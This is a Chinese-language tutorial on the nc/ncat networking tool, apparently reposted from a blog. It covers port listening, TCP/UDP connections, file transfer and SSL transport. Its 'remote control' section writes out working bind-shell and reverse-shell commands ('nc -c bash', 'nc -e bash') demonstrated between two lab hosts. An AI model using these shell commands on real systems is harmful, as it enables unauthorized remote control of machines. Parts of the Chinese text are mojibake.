nc介紹

ncat/nc 既是一個(gè)端口掃描工具，也是一款安全工具，還能是一款監(jiān)測(cè)工具，甚至可以做為一個(gè)簡(jiǎn)單的 TCP 代理。

在大多數(shù) Debian 發(fā)行版中，nc 是默認(rèn)可用的，它會(huì)在安裝系統(tǒng)的過(guò)程中自動(dòng)被安裝。 但是在 CentOS 7 / RHEL 7 的最小化安裝中，nc 并不會(huì)默認(rèn)被安裝。 需要用下列命令手工安裝。

yum install nmap-ncat -y

• 監(jiān)聽(tīng)端口

  使用-l選指定監(jiān)聽(tīng)端口，加上-v選項(xiàng)顯示詳細(xì)信息

[root@host_1 ~]# nc -lv 1234 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234

• 連接端口

  nc默認(rèn)就是連接端口，-v顯示詳細(xì)信息，-u連接udp端口

[root@host_2 ~]# nc -v 192.168.159.134 1234 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.159.134:1234.

查看系統(tǒng)開(kāi)啟的udp端口

[root@host_1 ~]# netstat -unlp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:3139 0.0.0.0:* 691/dhclient udp 0 0 127.0.0.1:323 0.0.0.0:* 640/chronyd udp 0 0 0.0.0.0:68 0.0.0.0:* 691/dhclient udp6 0 0 :::45845 :::* 691/dhclient udp6 0 0 ::1:323 :::* 640/chronyd

連接udp端口

[root@host_2 ~]# nc -vu 192.168.159.134 3139 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.159.134:3139.

• 傳輸文件

在端口已連接的基礎(chǔ)上，可以進(jìn)行文件傳輸。

• 主機(jī)1作為接受端打開(kāi)端口

[root@host_1 testdir]# nc -lv 1234 > receive.txt

主機(jī)2上連接端口并傳輸文件
[root@host_2 ~]# nc -v 192.168.159.134 1234 < anaconda-ks.cfg Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.159.134:1234. Ncat: 1238 bytes sent, 0 bytes received in 0.03 seconds.

• 遠(yuǎn)程控制

  現(xiàn)有host_1 host_2兩臺(tái)主機(jī)，演示host_2控制Host_1

host_1 192.168.159.134 host_2 192.168.159.130

• 正向控制

host_1執(zhí)行：

[root@host_1 testdir]# nc -l 1234 -c bash

host_2執(zhí)行：

[root@host_2 ~]# nc -v 192.168.159.134 1234 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.159.134:1234. hostname host_1

nc命令通過(guò)建立的連接將bash傳遞給對(duì)方。上面host_2連接成功后，執(zhí)行hostname命令返回host_1主機(jī)名，表示已成功控制host_1

由于正向控制是在被控端開(kāi)啟端口，所以若存在防火墻很有可能無(wú)法連接成功

• 反向連接

主機(jī)host_2監(jiān)聽(tīng)端口
[root@host_2 ~]# nc -l 1234
主機(jī)host_1連接端口并推送bash
[root@host_1 testdir]# nc -v 192.168.159.130 1234 -e $(which bash) Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Connected to 192.168.159.130:1234.
控制端主機(jī)開(kāi)啟端口監(jiān)聽(tīng)，被控端主動(dòng)連接端口并推送bash到控制端。

• nc傳輸加密

由于nc使用明文進(jìn)行傳輸數(shù)據(jù)，所以引入ncat命令。ncat命令使用--ssl選項(xiàng)表示開(kāi)啟ssl管道加密傳輸。

轉(zhuǎn)載于:https://www.cnblogs.com/technologylife/p/9211296.html

總結(jié)

以上是生活随笔為你收集整理的nc命令简介的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。